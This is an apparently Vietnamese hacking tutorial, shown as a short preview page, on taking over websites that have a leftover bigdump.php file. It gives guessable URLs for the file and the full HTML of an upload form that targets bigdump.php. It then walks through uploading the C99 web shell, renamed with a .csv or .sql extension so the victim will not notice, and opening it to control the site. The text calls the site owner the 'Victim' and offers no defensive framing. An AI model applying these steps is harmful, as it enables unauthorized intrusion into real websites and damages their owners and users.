Bạn đang xem bản rút gọn của tài liệu. Xem và tải ngay bản đầy đủ của tài liệu tại đây (55.22 KB, 1 trang )
Chiếm quyền Admin điều khiển Website
Một số website sau khi cài đặt xong lại quên dọn dẹp rác, điển hình là lỗi kô xóa file bigdump sau khi backup lại
database
Vì thế khi hacker tóm đc link chứa file bigdump sau đó upload một con shell lên để chiếm quyền admin điều
khiển website đó là điều cực dễ dàng.
Đầu tiên kiếm một forum quên xóa bigdump
Có thể đoán mò vì các webmaster gà giống mình thưởng để link kiểu này
http://domain/forum/bigdump.php
hay
http://domain/forum/caidat/bigdump.php
Khi đã tìm đc các bạn mở notepad soạn nội dung sau đây
[html]<title>: + : Share By Forlornhope : + : </title>
<form method="post" action="http://domain/forum/caidat/bigdump.php" enctype="multipart/form-data">
<input type="hidden" name="MAX_FILE_SIZE" value="$upload_max_filesize">
Shell Upload <input type="file" name="dumpfile" accept="*/*" size="60">
<input type="submit" name="uploadbutton" value="Upload">
</form>
<br>
<b>ByPass Bigdump - Found by ? ?</b>[/html]
Sửa lại link cho phù hợp.
http://domain/forum/bigdump.php
Save lại với tên shell.html
Tiếp theo download một con shell về VD con C99
c99 download - c99.txt
Sau khi download về và đổi tên thành c99.php.csv hoặc c99.php.sql gì đó cho Victim khó nhận biết
Tiếp theo mở shell.html vừa tạo
Chọn browse Chọn đến file c99.php.csv -> chọn upload
Đã upload thành công
Tiếp theo các bạn chạy link
http://domain/forum/c99.php.csv để điều khiển website đó
Mình sẽ hướng đẫn cách chiếm quyền admin sau.